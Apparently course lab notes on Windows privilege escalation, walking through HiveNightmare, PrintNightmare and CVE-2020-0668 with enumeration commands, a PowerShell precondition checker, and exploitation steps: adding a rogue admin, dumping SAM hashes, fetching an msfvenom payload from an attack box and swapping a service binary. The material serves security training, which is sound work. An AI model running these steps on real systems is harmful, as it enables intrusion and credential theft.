16.Kernel-exploits

Enumeration Commands

systeminfo
wmic qfe list brief
Get-Hotfix
icacls
whoami /priv
ls \\localhost\pipe\spoolss

Exploitation Commands

HiveNightmare.exe
impacket-secretsdump
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt"
msfvenom
python3 -m http.server <port>
wget http://<ip>:<port>/<file> -OutFile <file> # (PowerShell alias for Invoke-WebRequest; without -OutFile nothing is written to disk)
CVE-2020-0668.exe <source> <destination>
copy /Y <source> <destination>
msfconsole -r <resource_file>
net start MozillaMaintenance

Verification Commands

net user hacker
getuid # (Meterpreter)
hashdump # (Meterpreter)

Key Concepts:

  • Kernel Exploits:

    • Exploit vulnerabilities in the Windows kernel, or in drivers and SYSTEM-level services, to escalate from a low-privileged user to NT AUTHORITY\SYSTEM.

    • Strictly, none of the three bugs worked below lives in the kernel: HiveNightmare is a file ACL mistake, PrintNightmare is a Print Spooler service bug, and CVE-2020-0668 is a SYSTEM service trusting a user-controlled path. They are grouped here because the workflow is identical: enumerate missing patches, match a public exploit, run it.

    • Patching is crucial, but often lags or is incomplete (out-of-band fixes that need a registry workaround as well, hosts built from stale images, services left running).

  • Historical Vulnerabilities:

    • MS08-067 (Server service RCE, CVE-2008-4250; exploited by Conficker).

    • MS17-010 (EternalBlue, SMBv1 RCE; used by WannaCry and NotPetya).

    • ALPC Task Scheduler 0-day (CVE-2018-8440, local privilege escalation through the SchRpcSetSecurity ALPC call).

    • CVE-2021-36934 (HiveNightmare/SeriousSAM: BUILTIN\Users can read the SAM, SYSTEM and SECURITY hives from Volume Shadow Copies).

    • CVE-2021-1675/CVE-2021-34527 (PrintNightmare: Print Spooler driver installation via RpcAddPrinterDriverEx, giving local privilege escalation and remote code execution).

    • CVE-2020-0668 (Windows Service Tracing: any user can point a SYSTEM service's trace log at a chosen location, yielding an arbitrary file move as SYSTEM).

  • Patch Management:

    • Importance of keeping systems updated.

    • Older vulnerabilities remain relevant.

Approach, Commands, Tools, and Techniques:

  1. Enumeration:

    • systeminfo, wmic qfe list brief, Get-Hotfix (Installed updates: compare the newest KB and its install date against the release date of the fix for each candidate CVE).

    • icacls (File permissions: icacls on C:\Windows\System32\config\SAM showing BUILTIN\Users:(I)(RX) is the HiveNightmare indicator).

    • whoami /priv (Privileges held by the current token).

    • ls \\localhost\pipe\spoolss (Spooler service check: the pipe only exists while the Print Spooler is running, which PrintNightmare requires).

  2. Exploitation:

    • HiveNightmare (CVE-2021-36934):

      • HiveNightmare.exe (Copy the SAM, SYSTEM and SECURITY hives out of a shadow copy as a normal user).

      • impacket-secretsdump (Extract local hashes offline from the copied hives on the attack box).

    • PrintNightmare (CVE-2021-1675/CVE-2021-34527):

      • Set-ExecutionPolicy Bypass -Scope Process (Bypass PowerShell execution policy for this session only).

      • Import-Module .\CVE-2021-1675.ps1 (Import the PowerShell exploit).

      • Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" (Load a malicious printer driver DLL that adds a local administrator; the driver name is arbitrary).

    • CVE-2020-0668 (Service Tracing):

      • Build exploit in Visual Studio (the public PoC is a C# project).

      • msfvenom (Generate the payload; with a plain exe the service start times out with error 1053 but the payload normally calls back first, msfvenom's exe-service format avoids that).

      • Python HTTP server, wget (Serve the binary from the attack box and fetch it on the target).

      • CVE-2020-0668.exe <source> <destination> (Run exploit: move <source> to <destination> as SYSTEM, which lets a low-privileged user write into a protected directory).

      • copy (Replace the service binary with the payload).

      • Metasploit resource script, msfconsole -r (Start the handler that matches the msfvenom payload).

      • net start MozillaMaintenance (Start the service; it runs as LocalSystem and its ACL lets ordinary users start it, which is why it is chosen).

  3. Verification:

    • net user hacker (Verify user creation).

    • getuid (Meterpreter, verify SYSTEM privileges).

    • hashdump (Meterpreter, dump password hashes).
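The enumeration step above can be scripted so that the precondition of each of the three bugs is checked in one pass. The following is an added example, not code from the course page or from any of the exploit projects; it runs as the low-privileged user on the target, changes nothing, and marks its assumptions (the shadow-copy index range, the .NET version needed for \\?\ paths, and MozillaMaintenance as the service to look at) in comments.

```powershell
# Added example (not part of the course page): one-shot triage of the preconditions
# for HiveNightmare, PrintNightmare and CVE-2020-0668, run as the low-privileged user.
# Nothing here modifies the host.

function Test-Precondition([string]$Name, [bool]$Ok, [string]$Detail) {
    $state = if ($Ok) { 'LIKELY' } else { 'unlikely' }
    '{0,-16} {1,-9} {2}' -f $Name, $state, $Detail
}

# --- Patch level: newest hotfix date is the quickest "is this box stale?" indicator.
$os  = Get-CimInstance Win32_OperatingSystem
$hfx = Get-HotFix | Where-Object InstalledOn | Sort-Object InstalledOn
"Host: $($os.Caption) build $($os.BuildNumber)"
if ($hfx) { "Newest hotfix: $($hfx[-1].HotFixID) installed $($hfx[-1].InstalledOn.ToShortDateString())" }

# --- Token privileges: SeImpersonate/SeAssignPrimaryToken often mean an easier route than any of the bugs below.
$privs = whoami /priv /fo csv | ConvertFrom-Csv
$privs | Where-Object { $_.'Privilege Name' -match 'SeImpersonate|SeAssignPrimaryToken|SeBackup|SeRestore|SeDebug|SeLoadDriver' } |
    ForEach-Object { "Privilege: $($_.'Privilege Name') ($($_.State))" }

# --- PrintNightmare: the spooler must be running; the spoolss pipe is its RPC endpoint.
$spooler = Get-Service Spooler -ErrorAction SilentlyContinue
$pipe    = Test-Path -LiteralPath '\\localhost\pipe\spoolss'
Test-Precondition 'PrintNightmare' ($spooler.Status -eq 'Running' -and $pipe) "Spooler=$($spooler.Status) pipe=$pipe"

# --- HiveNightmare: BUILTIN\Users can read the hive AND at least one shadow copy exists.
# Get-Acl itself needs READ_CONTROL, so access denied here already means "patched or never vulnerable".
$samAcl    = Get-Acl 'C:\Windows\System32\config\SAM' -ErrorAction SilentlyContinue
$usersRead = [bool]($samAcl.Access | Where-Object {
    $_.IdentityReference -like '*\Users' -and $_.AccessControlType -eq 'Allow' -and $_.FileSystemRights -match 'Read|FullControl' })
# Probing indices 1..9 by device path is an assumption; vssadmin needs admin, this does not.
# [IO.File]::Exists passes \\?\ paths through unchanged on .NET 4.6.2+ (assumption).
$shadows = 1..9 | Where-Object {
    [System.IO.File]::Exists("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\SAM") }
Test-Precondition 'HiveNightmare' ($usersRead -and [bool]$shadows) "UsersRead=$usersRead shadows=$($shadows -join ',')"

# --- CVE-2020-0668: Users can write under HKLM\SOFTWARE\Microsoft\Tracing, and a SYSTEM service exists
#     whose binary can be replaced and which a user may start (the page uses MozillaMaintenance).
$trAcl      = Get-Acl 'HKLM:\SOFTWARE\Microsoft\Tracing' -ErrorAction SilentlyContinue
$usersWrite = [bool]($trAcl.Access | Where-Object {
    $_.IdentityReference -like '*\Users' -and $_.AccessControlType -eq 'Allow' -and $_.RegistryRights -match 'SetValue|WriteKey|FullControl' })
$svc     = Get-CimInstance Win32_Service -Filter "Name='MozillaMaintenance'"
$svcSddl = if ($svc) { sc.exe sdshow MozillaMaintenance | Where-Object { $_ -match '^D:' } } else { 'service not present' }
Test-Precondition 'CVE-2020-0668' ($usersWrite -and [bool]$svc) "TracingWrite=$usersWrite svc=$($svc.PathName) as $($svc.StartName)"
"Service DACL (RP granted to BU or AU means ordinary users may start it): $svcSddl"
```

Read the output top-down: a recent hotfix date does not rule anything out on its own (HiveNightmare needed a registry and ACL workaround beyond the update, and the spooler can simply be left running), so the per-bug lines are what decide which exploit from the Exploitation step to try first.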

Commands:

  • systeminfo, wmic qfe list brief, Get-Hotfix, icacls, whoami /priv, ls, Set-ExecutionPolicy, Import-Module, Invoke-Nightmare, msfvenom, python3 -m http.server, wget, copy, msfconsole, net user, net start, getuid, hashdump, impacket-secretsdump.

Tools:

  • HiveNightmare.exe, impacket, Metasploit, PowerShell scripts, custom exploits.

Task:

  • RDP to the target.

  • Exploit HiveNightmare, PrintNightmare, and CVE-2020-0668.

  • Escalate privileges to NT AUTHORITY\SYSTEM.

  • Retrieve the flag from the Administrator Desktop.
